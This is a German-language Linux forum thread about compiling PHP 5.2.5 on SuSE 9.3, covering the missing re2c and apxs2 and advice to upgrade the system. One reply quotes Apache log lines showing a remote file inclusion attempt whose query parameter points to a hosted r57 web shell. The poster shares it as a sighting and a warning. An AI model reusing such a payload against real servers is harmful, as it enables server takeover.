PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Apache, Lighttpd, nginx, Cherokee
stanglwirt
Posts: 48
Joined: 2006-01-10 14:44

PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by stanglwirt » 2007-12-04 22:12

Hallo,
ich will auf meinem lokalen Rechner (suse 9.3) PHP 5.2.5 kompilieren.
beim configure erhalte ich jedoch die meldung dass mir das "re2c" fehlt. über yast findet er das paket nicht, auch hab ich sonst kein paket für suse 9.3 gefunden. ist das vielleicht bei irgendeinem anderen paket dabei oder wie komme ich sonst daran?

Als zweites findet er meine "apxs2" nicht. Ich habe Apache 2 installiert. Hab auch auf dem ganzen rechner nach der datei gesucht aber die existiert einfach nicht.
die ist doch aber standardmäßig beim apachen dabei oder muss man das auch extra aktivieren beim installieren?

grüße

Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by Roger Wilco » 2007-12-04 22:19

stanglwirt wrote:ist das vielleicht bei irgendeinem anderen paket dabei oder wie komme ich sonst daran?

http://re2c.sourceforge.net/

stanglwirt wrote:Als zweites findet er meine "apxs2" nicht. Ich habe Apache 2 installiert. Hab auch auf dem ganzen rechner nach der datei gesucht aber die existiert einfach nicht.

Installiere das Paket apache2-devel.

PS: SuSE Linux 9.3 wird seit Juni nicht mehr unterstützt. Führe so schnell wie möglich ein Upgrade auf ein noch unterstütztes Betriebssystem durch!

User avatar
Joe User
Project Manager
Project Manager
Posts: 11138
Joined: 2003-02-27 01:00
Location: Hamburg

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by Joe User » 2007-12-04 22:26

re2c ist erst ab openSUSE 10.1 verfügbar, was das längst überfällige Upgrade auf openSUSE 10.2/10.3 erzwingt (SUSE 9.3 wird seit 2 Jahren nicht mehr supportet!). apxs2 ist im apache2-devel enthalten...

Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by Roger Wilco » 2007-12-04 22:29

Joe User wrote:(SUSE 9.3 wird seit 2 Jahren nicht mehr supportet!)

Ganz so schlimm ist es nicht. ;)
SuSE Linux 9.1 wird seit anderthalb Jahren nicht mehr supportet, SuSE Linux 9.3 "erst" seit Juni 2007, siehe http://en.opensuse.org/SUSE_Linux_Lifetime.

floogy
Posts: 150
Joined: 2007-10-23 22:00

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by floogy » 2007-12-04 22:49

Vielleicht auch mal die confixx version beachten:
http://entwickler-magazin.de/zonen/port ... 8,p,0.html
http://www.entwickler-blog.de/archiv/32 ... ploit.html
http://www.rootforum.org/forum/view ... hp?t=46593

Ich hatte nämlich gerade eben erst so etwas:

Code: Select all

/var/log/apache/access.log:
389.380.384.333 - - [04/Dec/2007:18:34:58 +0100] "POST http://389.310.356.310/admin/business_inc/saveserver.php?thisdir=http://www.mertcesur.xxx/shell/r57.txt? HTTP/1.0" 404 227 "http://389.310.356.310/admin/business_inc/saveserver.php?thisdir=http://www.mertcesur.xxx/shell/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
/var/log/apache/error.log:[Tue Dec  4 18:34:58 2007] [error] [client 389.380.384.333] File does not exist: /var/www/admin/business_inc/saveserver.php
Last edited by floogy on 2007-12-04 22:50, edited 1 time in total.

stanglwirt
Posts: 48
Joined: 2006-01-10 14:44

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by stanglwirt » 2007-12-04 22:49

danke für die infos.

werde mal schaun ob die rpm von re2c funktioniert. wenn nicht, werd ich wohl oder übel mal ne neue suse installieren.
wie gesagt, der rechner steht hier nur zum testen rum und hat eigentlich keine inet verbindung.

floogy
Posts: 150
Joined: 2007-10-23 22:00

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by floogy » 2007-12-04 22:53

stanglwirt wrote:...
wie gesagt, der rechner steht hier nur zum testen rum und hat eigentlich keine inet verbindung.


Ooops, hatte ich überlesen...

flo
Posts: 2223
Joined: 2002-07-28 13:02
Location: Berlin

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by flo » 2007-12-04 23:05

braucht man re2c, um PHP5.2.5 zu installieren? Der Configure lief auf meinem etch ohne Probleme durch, und re2c ist nicht installiert. Im configure war es drin.

<OT>
Heute hab ich spaßhalber mal nachgeschaut, worüber ein Kunde eMails verschickt ... Postfix auf SuSE 8.0, laut der dortigen EDV-Abteilung eine supersichere Firewall. Rechner heißt wohl nicht ohne Grund "dbsrv", die Leute dort gehen per XWindows auf diesen Gateway und surfen dann über den Rechner.
...
Die haben da fast alle studiert - ohne Witz!
</OT>

floogy
Posts: 150
Joined: 2007-10-23 22:00

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by floogy » 2007-12-04 23:08

Ich hatte re2c AFAIR früher unter woody mal zur Kompilierung von apc benötigt.
<OT>Vielleicht sind hier ein paar Forumsmitglieder nur paranoid :twisted: </OT>

flo
Posts: 2223
Joined: 2002-07-28 13:02
Location: Berlin

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by flo » 2007-12-04 23:10

Falls Du mich meinst ... ich steh dazu und hab das schon öfter gehört ... hab aber mittlerweile aufgehört, mein (rekursiver-)Nameserver-Logfile zu lesen.

:-)

floogy
Posts: 150
Joined: 2007-10-23 22:00

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by floogy » 2007-12-04 23:13

flo wrote:...hab aber mittlerweile aufgehört, mein (rekursiver-)Nameserver-Logfile zu lesen.

Wahrscheinlich aber auch nur aus Datenschutzgründen, und wegen der Paranoia sich durch Verstöße strafbar zu machen... :P

User avatar
Joe User
Project Manager
Project Manager
Posts: 11138
Joined: 2003-02-27 01:00
Location: Hamburg

Re: PHP 5.2.5 kompilieren -> re2c fehlt (suse 9.3)

Post by Joe User » 2007-12-05 00:52

Roger Wilco wrote:
Joe User wrote:(SUSE 9.3 wird seit 2 Jahren nicht mehr supportet!)

Ganz so schlimm ist es nicht. ;)
SuSE Linux 9.1 wird seit anderthalb Jahren nicht mehr supportet, SuSE Linux 9.3 "erst" seit Juni 2007

Ich reduziere Support in diesem Zusammenhang nicht auf Security-Fixes, sondern beziehe normale Bugfixe mit ein und Letztere werden deutlich früher eingestellt.
OK, auch dann sind es noch keine 2 Jahre, sondern "nur" knapp 1 Jahr, sorry ;)